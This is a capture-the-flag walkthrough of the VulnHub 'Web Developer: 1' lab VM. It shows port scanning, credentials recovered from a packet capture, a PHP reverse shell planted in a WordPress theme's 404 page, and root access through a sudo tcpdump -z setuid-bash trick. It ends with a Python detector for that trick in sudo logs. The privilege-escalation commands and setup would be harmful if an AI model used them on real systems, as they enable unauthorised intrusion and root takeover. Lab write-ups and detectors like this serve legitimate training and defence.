Web Developer: 1 Walkthrough (VulnHub)

Pulkit Marele
Feb 11, 2021

Today we’ll be continuing with our new machine on VulnHub. In this article, we will see a walkthrough of an interesting VulnHub machine called Web developer.

Here is the link to download this VM:

https://www.vulnhub.com/entry/web-developer-1,288/

Network Scanning

We always start with network scanning. Let’s find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As we saw in the netdiscover result, our target IP address is 192.168.43.25.

Enumeration/Reconnaissance

Our next step is scanning the target machine. Let’s start with nmap.

┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.25

With the help of nmap we are able to scan all open TCP ports. We start with port 80, which is HTTP.

Open http://192.168.43.25/ in the browser.

┌─[root@RDX]─[~]
└──╼ #nikto --url 192.168.43.25

┌─[✗]─[root@RDX]─[~]
└──╼ #dirb http://192.168.43.25

Open http://192.168.43.25/ipdata in the browser.

Now I got a file, analyze.cap.

login = webdeveloper
"pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"

On to the reverse shell now…

I had to switch to a different theme to bypass edit restrictions. I replaced the 404 error page with a PHP reverse shell, started the listener on host port 443, and I got the shell.

http://192.168.43.25/wp-content/themes/twentysixteen/404.php

┌─[root@RDX]─[~]
└──╼ #nc -nlvp 443

$ cd /var/www/html
$ ls

$ cat wp-config.php

/** MySQL database username */
define('DB_USER', 'webdeveloper');

/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');

/** MySQL hostname */
define('DB_HOST', 'localhost');

┌─[root@RDX]─[~]
└──╼ #ssh webdeveloper@192.168.43.25

Privilege Escalation

webdeveloper@webdeveloper:~$ sudo -l
Matching Defaults entries for webdeveloper on webdeveloper:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webdeveloper may run the following commands on webdeveloper:
(root) /usr/sbin/tcpdump

$ cd /tmp

$ touch bash

$ vim bash

cp /bin/bash /tmp/sh-1
chmod u+s /tmp/sh-1

$ chmod +x bash

$ sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/bash -Z root

sh-1-4.4$ ./sh-1 -p
sh-1-4.4# cd /root
sh-1-4.4# ls
flag.txt
sh-1-4.4# cat flag.txt

sh-1-4.4# id

We successfully got root privileges and the flag.txt file.
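
For defenders, the sudo invocation used above leaves a distinctive line in the sudo log. The following is an added example, not part of the original walkthrough: a small detector for tcpdump's -z postrotate hook run through sudo. The log lines are constructed samples, and the allowlist of expected compressors is an assumption.

```python
import re
import shlex

# sudo's syslog format: "<user> : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
# Assumption: compressors are the only postrotate commands expected on this host.
EXPECTED_POSTROTATE = {"gzip", "bzip2", "xz"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Constructed sample log lines (the first mirrors the command in this walkthrough).
SAMPLE_LOG = [
    "Feb 11 10:02:11 webdeveloper sudo: webdeveloper : TTY=pts/0 ; PWD=/tmp ; USER=root ; "
    "COMMAND=/usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/bash -Z root",
    "Feb 11 10:05:40 webdeveloper sudo: webdeveloper : TTY=pts/0 ; PWD=/home/webdeveloper ; "
    "USER=root ; COMMAND=/usr/sbin/tcpdump -i eth0 -w /var/log/cap.pcap -G 3600 -z gzip",
    "Feb 11 10:07:02 webdeveloper sudo: admin : TTY=pts/1 ; PWD=/root ; USER=root ; "
    "COMMAND=/usr/bin/apt update",
]

def option_value(opts, flag):
    """Value of a single-letter option given as '-z cmd' or '-zcmd', else None."""
    for i, arg in enumerate(opts):
        if arg == flag:
            return opts[i + 1] if i + 1 < len(opts) else None
        if arg.startswith(flag) and len(arg) > len(flag):
            return arg[len(flag):]
    return None

def tcpdump_findings(line):
    """Return reasons a sudo log line looks like abuse of tcpdump's -z hook."""
    m = SUDO_RE.search(line)
    if not m:
        return []
    argv = shlex.split(m.group("cmd"))
    if not argv or argv[0].rsplit("/", 1)[-1] != "tcpdump":
        return []
    opts, findings = argv[1:], []
    hook = option_value(opts, "-z")
    if hook is None:
        return findings
    if hook.rsplit("/", 1)[-1] not in EXPECTED_POSTROTATE:
        findings.append("unexpected postrotate command: " + hook)
    if hook.startswith(WRITABLE_DIRS):
        findings.append("postrotate command in world-writable directory")
    if option_value(opts, "-Z") == "root":
        findings.append("postrotate command runs as root (-Z root)")
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(tcpdump_findings(entry) or "ok")
```

Detection only covers the symptom: the `(root) /usr/sbin/tcpdump` rule shown by `sudo -l` accepts arbitrary arguments, including `-z`, so the durable fix is on the sudoers side.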